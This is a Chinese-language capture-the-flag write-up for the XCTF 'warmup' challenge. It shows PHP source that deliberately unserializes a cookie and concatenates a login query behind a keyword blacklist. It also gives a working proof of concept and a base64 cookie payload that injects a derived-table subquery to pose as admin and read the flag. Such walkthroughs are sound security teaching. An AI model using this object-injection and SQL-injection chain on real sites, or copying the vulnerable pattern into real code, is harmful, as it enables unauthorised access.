warmup (反序列化与sql注入)

题目来源

攻防世界  NO.GFSJ0999

题目描述

题目提示:平平无奇的输入框

打开网址页面如下,没有有用信息。

题目给了附件,直接下载,得到源码如下:

index.php(其中页面布局等无用代码省略)

<?php

include 'conn.php';

include 'flag.php';

if (isset ($_COOKIE['last_login_info'])) {

    $last_login_info = unserialize (base64_decode ($_COOKIE['last_login_info']));         //对cookie中的last_login_info进行反序列化。下面的代码已经可以不用看了,这里就是这道题的入口。

    try {

        if (is_array($last_login_info) && $last_login_info['ip'] != $_SERVER['REMOTE_ADDR']) {

            die('WAF info: your ip status has been changed, you are dangrous.');

        }

    } catch(Exception $e) {

        die('Error');

    }

} else {

    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;

    setcookie ('last_login_info', $cookie, time () + (86400 * 30));

}

if(isset($_POST['username']) && isset($_POST['password'])){

    $table = 'users';

    $username = addslashes($_POST['username']);

    $password = addslashes($_POST['password']);

    $sql = new SQL();

    $sql->connect();

    $sql->table = $table;

    $sql->username = $username;

    $sql->password = $password;

    $sql->check_login();

}

?>

conn.php

<?php

include 'flag.php';

class SQL {

    public $table = '';

    public $username = '';

    public $password = '';

    public $conn;

    public function __construct() {

    }

    public function connect() {

        $this->conn = new mysqli("localhost", "xxxxx", "xxxx", "xxxx");

    }

        //若返回结果的username字段值为admin则给出flag

    public function check_login(){

        $result = $this->query();

        if ($result === false) {

            die("database error, please check your input");

        }

        $row = $result->fetch_assoc();

        if($row === NULL){

            die("username or password incorrect!");

        }else if($row['username'] === 'admin'){

            $flag = file_get_contents('flag.php');

            echo "welcome, admin! this is your flag -> ".$flag;

        }else{

            echo "welcome! but you are not admin";

        }

        $result->free();

    }

        //对数据库进行查询的语句

    public function query() {

        $this->waf();

        return $this->conn->query ("select username,password from ".$this->table." where username='".$this->username."' and password='".$this->password."'");

    }

    public function waf(){

        $blacklist = ["union", "join", "!", "\"", "#", "$", "%", "&", ".", "/", ":", ";", "^", "_", "`", "{", "|", "}", "<", ">", "?", "@", "[", "\\", "]" , "*", "+", "-"];

        foreach ($blacklist as $value) {

            if(strripos($this->table, $value)){

                die('bad hacker,go out!');

            }

        }

        foreach ($blacklist as $value) {

            if(strripos($this->username, $value)){

                die('bad hacker,go out!');

            }

        }

        foreach ($blacklist as $value) {

            if(strripos($this->password, $value)){

                die('bad hacker,go out!');

            }

        }

    }

    public function __wakeup(){

        if (!isset ($this->conn)) {

            $this->connect();

        }

        if($this->table){

            $this->waf();

        }

        $this->check_login();

        $this->conn->close();

    }

}

?>

题解

本文参考:https://www.cnblogs.com/Goo1/p/17644523.html

显然这题是一道反序列化和sql注入结合的题目,反序列化的参数是$last_login_info

这道题的重点不在于反序列化,反序列化只是提供一个进入函数的入口。

当反序列化开始进行时,若有__wakeup()函数,则执行__wakeup()函数。

可以看到最后得到flag但是代码在check_login()函数,check_login()函数有调用了query()函数对数据库进行查询,并返回结果。

若返回的结果中字段username的值为admin,则返回flag。

观察query()函数中的查询语句:

"select username,password from ".$this->table." where username='".$this->username."' and password='".$this->password."'"

没办法像多数sql注入的题目一样爆库爆表名,我们也无法保证select的结果为admin。

这里涉及知识点:查询虚拟表

poc如下:

<?php

    class SQL{

        public $table;

        public $username;

        public $password;

        public $conn;

    }

    $o=new SQL();

    //括号外的a是子查询表的名字

    $o->table="(select 'admin' username,'123' password)a";

    //要和表内的字段值一致

    $o->username='admin';

    $o->password='123';

    echo serialize($o);

闭合时查询语句为

select username,password from (select 'admin' username,'123' password)a where username='admin' and password='123'

下面对这条查询语句进行解释

select 'admin' username,'123' password

这部分创建了一个临时的虚拟表,其中包含两列:username 和 password,并且它们的值分别是 'admin' 和 '123'。

(select 'admin' username,'123' password) a

上面的子查询被命名为 a。这意味着整个子查询的结果会被视为一个名为 a 的表。

select username,password from (select 'admin' username,'123' password)a where username='admin' and password='123'

这部分从虚拟表 a 中选择 username 和 password 两列,并且只选择满足条件 username='admin' 和 password='123' 的记录。

综合来看,该 SQL 语句最终返回的结果是:

username password
admin 123

满足条件$row['username'] === 'admin'

将得到的序列化对象进行base64编码

TzozOiJTUUwiOjQ6e3M6NToidGFibGUiO3M6NDE6IihzZWxlY3QgJ2FkbWluJyB1c2VybmFtZSwnMTIzJyBwYXNzd29yZClhIjtzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjM6IjEyMyI7czo0OiJjb25uIjtOO30=

赋值给$last_login_info

查看页面源码得到flag

【攻防世界】warmup的更多相关文章

  1. 攻防世界(十一)warmup

    攻防世界系列 :warmup 1.打开题目,一个贱贱的滑稽表情 F12看到注释内容source.php 2.访问source.php <?php highlight_file(__FILE__) ...

  2. 攻防世界 WEB 高手进阶区 HCTF 2018 warmup Writeup

    攻防世界 WEB 高手进阶区 HCTF 2018 warmup Writeup 题目介绍 题目考点 PHP代码审计 Writeup 打开 http://220.249.52.134:37877 常规操 ...

  3. 攻防世界 WriteUp

    附:|>>>攻防世界-WEB-新手练习区<<<| WriteUp目录 01.|>>>baby_web<<<| 02.|>& ...

  4. CTF--web 攻防世界web题 robots backup

    攻防世界web题 robots https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=506 ...

  5. CTF--web 攻防世界web题 get_post

    攻防世界web题 get_post https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5 ...

  6. 攻防世界 web进阶练习 NewsCenter

    攻防世界 web进阶练习 NewsCenter   题目是NewsCenter,没有提示信息.打开题目,有一处搜索框,搜索新闻.考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有 ...

  7. 【攻防世界】高手进阶 pwn200 WP

    题目链接 PWN200 题目和JarvisOJ level4很像 检查保护 利用checksec --file pwn200可以看到开启了NX防护 静态反编译结构 Main函数反编译结果如下 int ...

  8. XCTF攻防世界Web之WriteUp

    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...

  9. 攻防世界 | CAT

    来自攻防世界官方WP | darkless师傅版本 题目描述 抓住那只猫 思路 打开页面,有个输入框输入域名,输入baidu.com进行测试 发现无任何回显,输入127.0.0.1进行测试. 发现已经 ...

  10. 攻防世界 robots题

    来自攻防世界 robots [原理] robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在, ...

随机推荐

  1. PM-数据治理-数据资产管理

      在组织中,并非所有的数据都构成数据资产,数据资产是能够为组织产生价值的数据,数据资产的形成需要对数据进行主动管理并形成有效控制.   数据资产管理是规划.控制和提供数据及信息资产的一组业务职能,包 ...

  2. 拥抱云原生,数据湖加速器 GooseFS 助力 Fluid 数据缓存实现

    01 ​前言 数据湖加速器 GooseFS 是由腾讯云推出的高性能.高可用.弹性的分布式缓存方案.依靠对象存储(Cloud Object Storage,COS)作为数据湖存储底座的成本优势,为数据湖 ...

  3. R数据分析:非劣效性研究设计的统计处理方法,原理和实例

    在我们经常接触的统计模式中,我们是在寻求推翻原假设,证明差异,这种统计模型在传统的临床试验中,在各种统计推断中已经成为默认了.在传统的临床试验中通常会将一种新的治疗方法与标准治疗或安慰剂进行比较,从而 ...

  4. 解决phpmyadmin导入MYSQL数据库限制大小为50M的问题

    有时候想导入的数据库太大.但是遭到的限制 解决phpmyadmin导入MYSQL数据库限制大小为50M的问题 转载于:https://www.cnblogs.com/wesky/p/10609340. ...

  5. Qt编写地图综合应用36-覆盖物折线

    一.前言 折线图目前应用最广的也是用来绘制各种轨迹,折线图其实就是后面动态轨迹图.飞机航线图的前身,公用的一个方法addPolyline,折线图可以设置颜色.粗细.透明度等属性,如果开启了悬浮绘图工具 ...

  6. Qt编写的项目作品5-物联网管理平台

    一.功能特点 1 软件模块 设备监控模块,包括数据监控(表格形式展示).设备面板(面板形式展示).地图监控(地图形式展示).曲线监控(曲线形式展示). 数据查询模块,包括报警记录.运行记录.操作记录. ...

  7. Qt编写安防视频监控系统55-布局方案

    一.前言 这是近期对视频监控系统做得最大的改动,采用了QMainWindow停靠窗体悬停窗体,极大的增强了拓展性,主界面中的各种小模块全部采用了悬停模块,最后不同的工作模式.不同的运行状态(全屏状态. ...

  8. Vue cli 2.x 3.x及4.x区别

    原文链接: 1.Vue cli 2.x 3.x及4.x区别 2.vue-cli2.0/3.0/4.0创建项目的方式差异解读和vue-cli4.0打包命令和环境配置

  9. [转]实体类与数据库字段不匹配问题,java.sql.SQLSyntaxErrorException: Unknown column 'xxx' in 'field list'

    控制台报错 ### Error querying database. Cause: java.sql.SQLSyntaxErrorException: Unknown column 'user_nam ...

  10. 首次公开,最新手机QQ客户端架构的技术演进实践

    本文由腾讯技术何金源分享,原题"不畏移山,手机QQ技术架构升级变迁史",本文进行了排版和内容优化等. 1.引言 接上篇<总是被低估,从未被超越,揭秘QQ极致丝滑背后的硬核IM ...